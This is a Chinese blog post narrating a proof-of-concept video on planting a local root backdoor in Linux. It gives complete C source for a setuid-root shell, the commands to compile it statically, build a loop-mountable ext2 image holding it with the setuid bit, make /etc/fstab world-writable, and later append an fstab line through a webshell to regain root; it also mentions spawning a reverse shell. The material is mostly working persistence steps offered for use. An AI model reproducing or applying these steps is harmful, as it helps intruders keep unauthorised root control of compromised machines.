测试一下录像效果视频，顺带说一下我以前的一篇文章（linux下留本地后门的两个方法 http://hi.baidu.com/xi4oyu/blog/item/cc9741fa28f3e2106c22eb6f.html）里面那个test文件的制作方法。

华丽丽的啥也看不见阿，悲剧，跪求好的存放视频地点。



这是一个POC视频，演示了通过chmod a+w /etc/fstab 方式留本地后门的过程 看下setuid.c的内容。

很简单的一个setuid，然后system调/bin/bash，这样做是为了躲过bash的检查。

#include<stdio.h>
#include<sys/types.h>
#include <unistd.h>
 
int main(){
 
	setuid(0);
	seteuid(0);
	setgid(0);
	setegid(0);
	system("/bin/bash");
	return 0;
}

现在编译它，加入-static参数使得不依赖于特定的版本。

root@3xpl4b:/home/xi4oyu# gcc -o setuid -O3 -static setuid.c
root@3xpl4b:/home/xi4oyu# ldd setuid

不是动态可执行文件 看下setuid文件的大小，静态链接的文件比较大。

现在开始做那个test文件，使用dd来生成一个1m大小的文件

root@3xpl4b:/home/xi4oyu# dd if=/dev/sda of=test bs=1M count=1
在上面建立文件系统，ext2就够了
root@3xpl4b:/home/xi4oyu# mkfs.ext2 test

mke2fs 1.41.11 (14-Mar-2010) test is not a block special device.
无论如何也要继续? (y,n) y
文件系统标签=
操作系统:Linux

块大小=1024 (log=0)
分块大小=1024 (log=0)
Stride=0 blocks, Stripe width=0 blocks 16 inodes, 100 blocks 5 blocks (5.00%) reserved for the super user
第一个数据块=1 1 block group 8192 blocks per group, 8192 fragments per group 16 inodes per group
正在写入inode表: 完成
Writing superblocks and filesystem accounting information: 完成
This filesystem will be automatically checked every 22 mounts or 180 days, whichever comes first.
Use tune2fs -c or -i to override.

root@3xpl4b:/home/xi4oyu# file test
test: Linux rev 1.0 ext2 filesystem data, UUID=8a78c1f7-8c38-47cf-b579-0f19b4803b79

挂载它 root@3xpl4b:/home/xi4oyu# mount -o loop ./test /mnt
注意-o 参数 root@3xpl4b:/home/xi4oyu# cd /mnt 注意-o loop参数。

现在将我们刚做的程序copy进去。 加个setuid位。 这个文件就做好了。

现在演示下怎么利用 比如我们已经拿到了root权限，使用chmod a+w给/etc/fstab加上all write权限 好.

现在看我们下次怎么通过这个后门再次获取root。

这是一个webshell。 我们为了方便操作，先弹个shell回来。弄个ptyshell先

修改下/etc/fstab文件。 echo ‘test /mnt ext2 user,suid,exec,loop 0 0′ >> /etc/fstab 把我们刚做的test文件传上去。

拿root权限，呵呵，可以了吧，其实原理很简单。 OK了。

欢迎光临我的新站http://www.pentestday.com 主要关注Linux安全。

谢谢。